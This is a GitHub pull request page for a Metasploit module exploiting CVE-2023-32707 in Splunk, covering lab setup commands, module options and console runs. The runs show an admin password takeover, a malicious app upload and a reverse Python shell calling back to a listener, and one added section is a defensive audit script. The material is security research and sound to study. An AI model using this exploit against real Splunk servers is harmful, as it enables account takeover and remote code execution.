
Splunk account take over (CVE-2023-32707) leading to RCE #18348

Merged
merged 14 commits into from
Oct 26, 2023


heyder
Contributor

@heyder heyder commented Sep 7, 2023

This module exploits an authorization vulnerability in Splunk (CVE-2023-32707), allowing a lower privileged user with the capability edit_user to take over the admin account and log in to upload a malicious app, achieving remote code execution.

Closes #18061

Vulnerable Application

Create a Splunk docker container with the following commands:

    docker run --rm -p 8000:8000 -p 8089:8089 -e "SPLUNK_START_ARGS=--accept-license" -e "SPLUNK_PASSWORD=password" --name splunk-9.0.4 splunk/splunk:9.0.4
    # Creating non-admin user
    $ curl -k -u admin:password https://localhost:8089/services/authentication/users -d name=redway -d password=changeme -d roles=user -d createrole=1 -X POST
    # Adding capability to edit_user to the non-admin role
    $ curl -k -u admin:password https://localhost:8089/services/authorization/roles/user-redway -d capabilities=edit_user -X POST

Scenarios

Docker container running Splunk 9.0.4

If the user you have access to doesn't have the capability edit_user, the module will fail as shown below:

    msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > check
    [*] Splunk version 9.0.4 detected
    [*] 127.0.0.1:8000 - The target is not exploitable. User 'redway' does not have 'edit_user' capability
    msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) >

If the targeted user does have the capability install_apps, the module will fail as shown below:

    msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > exploit
    [*] Started reverse TCP handler on 172.17.0.1:4444
    [*] Running automatic check ("set AutoCheck false" to disable)
    [*] Splunk version 9.0.4 detected
    [+] The target appears to be vulnerable. User 'redway' has 'edit_user' capability
    [*] Changing 'user' password to yMDIOKyrHoUx
    [+] Password of the user 'user' has bee changed to yMDIOKyrHoUx
    [-] Exploit aborted due to failure: bad-config: The user 'user' does not have 'install_app' capability. You may consider to target other user
    [*] Exploit completed, but no session was created.
    msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) >

In an exploitable scenario, it behaves as shown:

    msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > options
    Module options (exploit/multi/http/splunk_privilege_escalation_cve_2023_32707):
       Name             Current Setting      Required  Description
       ----             ---------------      --------  -----------
       APP_NAME                              no        The name of the app to upload (default: random)
       PASSWORD         changeme             yes       The password for the specified username
       Proxies          http:127.0.0.1:8080  no        A proxy chain of format type:host:port[,type:host:port][...]
       RHOSTS           127.0.0.1            yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
       RPORT            8000                 yes       The target port (TCP)
       SSL              false                no        Negotiate SSL/TLS for outgoing connections
       TARGET_PASSWORD                       no        The new password to set for the admin user (default: random)
       TARGET_USER      admin                yes       The username to change the password for (default: admin)
       USERNAME         redway               yes       The username with "edit_user" role to authenticate as
       VHOST                                 no        HTTP server virtual host
    Payload options (cmd/unix/reverse_python):
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LHOST  172.17.0.1       yes       The listen address (an interface may be specified)
       LPORT  4444             yes       The listen port
       SHELL  /bin/sh          yes       The system shell to use
    Exploit target:
       Id  Name
       --  ----
       0   Splunk <= 9.0.5, 8.2.11, and 8.1.14 / Linux
    View the full module info with the info, or info -d command.
    msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > exploit
    [*] Started reverse TCP handler on 172.17.0.1:4444
    [*] Running automatic check ("set AutoCheck false" to disable)
    [*] Splunk version 9.0.4 detected
    [+] The target appears to be vulnerable. User 'redway' has 'edit_user' capability
    [*] Changing 'admin' password to srviInIpi
    [+] Password of the user 'admin' has bee changed to srviInIpi
    [*] Uploading app stringtough
    [*] Uploading file stringtough
    [*] Creating an application package named: stringtough
    [+] stringtough successfully uploaded
    [*] Waiting for session
    [*] Command shell session 1 opened (172.17.0.1:4444 -> 172.17.0.2:52672) at 2023-09-12 15:19:53 +0200
    id
    uid=41812(splunk) gid=41812(splunk) groups=41812(splunk),999(ansible)
    pwd
    /opt/splunk/etc/apps/stringtough/bin
    exit
    [*] 127.0.0.1 - Command shell session 1 closed.

Docker container running Splunk 9.0.5

On a non-vulnerable version the module will fail as shown below:

    msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > exploit
    [*] Started reverse TCP handler on 172.17.0.1:4444
    [*] Running automatic check ("set AutoCheck false" to disable)
    [!] The target is not exploitable. Detected Splunk version 9.0.5 which is not vulnerable ForceExploit is enabled, proceeding with exploitation.
    [*] Changing 'admin' password to iDKBmVsj
    [-] Exploit aborted due to failure: unexpected-reply: Unable to change admin's password.
    [*] Exploit completed, but no session was created.
    msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > set ForceExploit true
    ForceExploit => true
    msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > exploit
    [*] Started reverse TCP handler on 172.17.0.1:4444
    [*] Running automatic check ("set AutoCheck false" to disable)
    [!] The target is not exploitable. Detected Splunk version 9.0.5 which is not vulnerable ForceExploit is enabled, proceeding with exploitation.
    [*] Changing 'admin' password to scupUXtcV
    [-] Exploit aborted due to failure: unexpected-reply: Unable to change admin's password.
    [*] Exploit completed, but no session was created.
    msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) >
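As an added defender-side example (not part of the module or this PR), a small Python audit that checks the two preconditions the description above relies on: a build below the fixed release, and a role other than admin carrying edit_user, directly or through an imported role. It assumes 9.0.5, 8.2.11 and 8.1.14 are the fixed releases (consistent with the 9.0.5 run above), and the roles input is a constructed sample in the JSON shape returned by GET /services/authorization/roles?output_mode=json.

```python
import json

# Constructed sample of the JSON that GET /services/authorization/roles?output_mode=json
# returns; field names follow Splunk's REST layout, the role names and values are made up.
SAMPLE_ROLES_JSON = json.dumps({"entry": [
    {"name": "admin", "content": {"capabilities": ["edit_user", "install_apps"],
                                  "imported_capabilities": []}},
    {"name": "power", "content": {"capabilities": ["schedule_search"],
                                  "imported_capabilities": ["search"]}},
    {"name": "user-redway", "content": {"capabilities": ["edit_user"],
                                        "imported_capabilities": ["search"]}},
    {"name": "helpdesk", "content": {"capabilities": [],
                                     "imported_capabilities": ["edit_user"]}},
]})

# First fixed release per maintenance branch (assumption: 9.0.5, 8.2.11 and 8.1.14,
# matching the 9.0.5 test in the PR); branches not listed here are reported as unknown.
FIXED = {(9, 0): (9, 0, 5), (8, 2): (8, 2, 11), (8, 1): (8, 1, 14)}

def parse_version(text):
    """'9.0.4' -> (9, 0, 4); missing components default to 0."""
    parts = [int(p) for p in text.strip().split(".")[:3]]
    return tuple(parts + [0] * (3 - len(parts)))

def is_vulnerable_version(text):
    """True if below the branch's fixed release, False if at/above it, None if the branch is unknown."""
    v = parse_version(text)
    fixed = FIXED.get(v[:2])
    return None if fixed is None else v < fixed

def roles_with_edit_user(roles_json, trusted=("admin",)):
    """Names of roles outside `trusted` that hold edit_user directly or via an imported role."""
    exposed = []
    for entry in json.loads(roles_json)["entry"]:
        content = entry.get("content", {})
        caps = set(content.get("capabilities", [])) | set(content.get("imported_capabilities", []))
        if "edit_user" in caps and entry["name"] not in trusted:
            exposed.append(entry["name"])
    return exposed

def audit(version, roles_json):
    """Flag the host unless the build is known fixed or no non-admin role can edit users."""
    vuln = is_vulnerable_version(version)
    exposed = roles_with_edit_user(roles_json)
    return {"vulnerable_version": vuln, "exposed_roles": exposed,
            "at_risk": vuln is not False and bool(exposed)}

if __name__ == "__main__":
    print(audit("9.0.4", SAMPLE_ROLES_JSON))
```

Against a live instance, fetch the roles endpoint with the same curl credentials used in the setup above and pass the body to audit(); an unknown branch is still flagged when exposed roles exist, so it errs toward review.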

@bcoles bcoles added the module label Sep 7, 2023
@heyder heyder changed the title from "Placeholder for CVE-2023-32707" to "Splunk account take over (CVE-2023-32707) leading to RCE" Sep 15, 2023
@heyder heyder marked this pull request as ready for review September 15, 2023 15:08
@adfoster-r7 adfoster-r7 self-assigned this Sep 18, 2023
eu added 3 commits September 22, 2023 11:52
TODO: distinguish commands that return output and commands that don't
- The cleanup method is deleting the job and removing the app directory
- Added a change dir command as an AutoRunScript just to avoid the error when trying to access the current directory in the session
@zgoldman-r7 zgoldman-r7 added the rn-modules release notes for new or majorly enhanced modules label Oct 19, 2023
@zgoldman-r7 zgoldman-r7 merged commit d960aa5 into rapid7:master Oct 26, 2023
@zgoldman-r7
Contributor

Release Notes

This module exploits an authorization vulnerability in Splunk, targeting CVE-2023-32707, allowing a lower privileged user with the capability edit_user to take over the admin account and log in to upload a malicious app, achieving remote code execution.

@heyder heyder deleted the mod/splunk_cve_2023_32707 branch October 26, 2023 16:19